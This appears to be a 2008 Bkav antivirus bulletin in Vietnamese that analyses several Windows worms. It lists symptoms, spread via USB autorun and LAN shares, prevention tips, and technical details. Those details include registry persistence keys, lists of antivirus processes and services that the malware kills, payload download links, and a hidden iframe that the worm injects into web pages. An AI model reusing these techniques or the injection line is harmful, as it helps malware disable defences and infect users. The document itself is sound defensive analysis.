Không hiện được các file có thuộc tính ẩn.. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng
Trang 1Bkav2022 (27/11/2008) cập nhật lần thứ 1: VomoG, DashferFG
Malware cập nhật mới nhất:
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Bị ăn cắp mật khẩu tài khoản Game Online
Bị Hacker chiếm quyền điều khiển từ xa
Hiện tượng:
Sửa registry
Không sử dụng được một số chương trình Antivirus, một vài tiện ích của Windows và một vài chương trình khác
Không hiện được các file có thuộc tính ẩn
Hiện các popup quảng cáo gây khó chịu
Vào Yahoo Messenger một lúc thì bị thông báo Send/Don't Send và không
sử dụng được
Có thể bị sập toàn bộ mạng LAN (không truy cập vào Internet được)
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm vào USB
Giả mạo Gateway để phát tán link độc có chứa virus
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Copy bản thân thành file có tên "wuauc1t.exe" và "Explorer.exe" vào thư mục %SysDir%
Copy bản thân thành file có tên "MSDN.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa
Ghi giá trị "IEXPLORER" vào key HKLM\ \Run, sửa giá trị "Shell" trong key HKLM\ \Winlogon để virus được kích hoạt mỗi khi windows khởi động
Trang 2 Ghi key debugger để chạy file của virus thay vì chạy các file : 360rpt.EXE, 360safe.EXE, 360tray.EXE, AVP.EXE, AvMonitor.EXE, CCenter.EXE, IceSword.EXE, Iparmor.EXE, KVMonxp.kxp, KVSrvXP.EXE,
KVWSC.EXE, Navapsvc.EXE, Nod32kui.EXE, KRegEx.EXE,
Frameworkservice.EXE, Mmsk.EXE, Wuauclt.EXE, Ast.EXE,
WOPTILITIES.EXE, Regedit.EXE, AutoRunKiller.EXE, VPC32.EXE, VPTRAY.EXE, ANTIARP.EXE, KASARP.EXE, ~.EXE, RAS.EXE,
Runiep.EXE, GuardField.EXE, GFUpd.EXE
Tắt các process : VsTskMgr.exe, Runiep.exe, RAS.exe, UpdaterUI.exe, TBMon.exe, KASARP.exe, scan32.exe, VPC32.exe, VPTRAY.exe,
ANTIARP.exe, KRegEx.exe, KvXP.kxp, kvsrvxp.kxp, kvsrvxp.exe,
KVWSC.EXE, Iparmor.exe, 360rpt.EXE, CCenter.EXE, RAVMON.EXE, RAVMOND.EXE,
GuardField.exe, Ravxp.exe, GFUpd.exe
Dừng các service : McShield, KWhatchsvc, KPfwSvc, Symantec AntiVirus, Symantec AntiVirus Definition Watcher
McAfee Framework, Norton AntiVirus Server
Xóa key không cho người dùng khởi động vào chế độ Safe mode
Ghi key không cho người dùng hiển thị các file có thuộc tính ẩn và hệ thống
Tự động update bản thân từ link : http://xni[removed]i.com/mm.exe
Download malware từ các link :
http://xni[removed]i.com/1.exe
http://xni[removed]i.com/10.exe
Các malware này bao gồm:
o Trojan giả mạo gateway để phát tán virus qua link độc
(http://w.xnibi.co[removed]/index.gif, )
o Downloader (tải về rất nhiều malware khác)
o Keylogger (ăn cắp mật khẩu Games Online)
o Adware (popup các trang web quảng cáo, sửa StartPage của IE),
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày: W32.CryptAgnt.Rootkit,
W32.VomoG.PE, W32.KavoDLAMA.Worm, W32.OlGZJA.Trojan,
W32.DashferFG.PE, W32.Afinding.Adware, W32.Wserving.Adware,
W32.AmvoSJ.Worm, W32.FakeAntiSL.Trojan, W32.SecretIJS.Worm,
W32.TavoSK.Worm, W32.WinKS.Worm
Trang 3Bkav2024 (28/11/2008) cập nhật lần thứ 2: WhBoyAO, FialaDMD
Malware cập nhật mới nhất:
Loại: PE
Nguy cơ:
Phá hủy chương trình, dữ liệu
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Làm mờ icon một số file exe
Ngăn cản người sử chạy các chương trình diệt virus
Ghi file Desktop_.ini vào tất cả các thư mục
Không xem được file ẩn
Làm tốc độ máy chậm đi rõ rệt
Cách thức lây nhiễm:
Tự động lây nhiễm vào USB
Phát tán qua các tài nguyên chia sẻ mạng nội bộ
Phát tán qua trang web: các trang web
Cách phòng tránh:
Không nên mở các ổ USB mới chưa được quét virus bằng cách nháy kép vào
ổ đĩa
Không nên share full các ổ đĩa, thư mục trong mạng nội bộ, nên đặt
password truy cập nếu muốn chia sẻ quyền sửa và tạo file
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Mô tả kỹ thuật:
Ghi giá trị
“svcshare”=”%WINDIR%\system32\drivers\spoclsv.exe”
Vào key HKCU\Software\Microsoft\Windows\CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động
Ghi giá trị
“CheckedValue”=”0”
Vào key HKLM\ \Explorer\Advanced\Folder\Hidden\SHOWALL để
không hiện file ẩn nhằm che dấu virus
Trang 4 Copy nó thành file "spoclsv.exe" vào thư mục %WinDir%\system32\drivers\
Copy bản thân thành các file có tên "Setup.exe" vào tất cả các ổ đĩa USB, ổ đĩa mềm và ghi vào các ổ đĩa đó file "autorun.inf" để virus phát tán qua các
ổ đĩa này
Copy bản thân nó thành "GameSetup.exe" vào tất cả các thư mục share trong mạng nội bộ để virus phát tán qua mạng LAN
Tìm và xóa các file có phần mở rộng là "gho" (các file ghost)
Tìm và lây vào các file có phần mở rộng là "htm", "html", "asp", "aspx",
"jsp", "asp", "php" đoạn mã sau để liên kết tới trang web chứa virus
<iframe src=http://www.krv[Removed]r.com/worm.htm width="0" height="0"></iframe>
Tìm và lây toàn bộ thân virus vào các file có phần mở rộng là "exe", "scr",
"pif", "com"
Dừng các dịch vụ của các chương trình diệt virus và firewall:
o Schedule
o sharedaccess
o RsCCenter
o RsRavMon
o KVWSC
o KVSrvXP
o kavsvc
o AVP
o McAfeeFramework
o McShield
o navapsvc
o wscsvc
o KPfwSvc
o SNDSrvc
o ccProxy
o ccEvtMgr
o ccSetMgr
o SPBBCSvc
o Symantec Core LC
o NPFMntor
o MskService
o FireSvc
Xóa các key để ngăn các chường trình diệt virus chạy lúc khởi động trong HKLM\Software\Microsoft\Windows\CurrentVersion\Run:
o RavTask
Trang 5o KvMonXP
o kav
o KAVPersonal50
o McAfeeUpdaterUI
o Network Associates Error Reporting Service
o ShStatEXE
o YLive.exe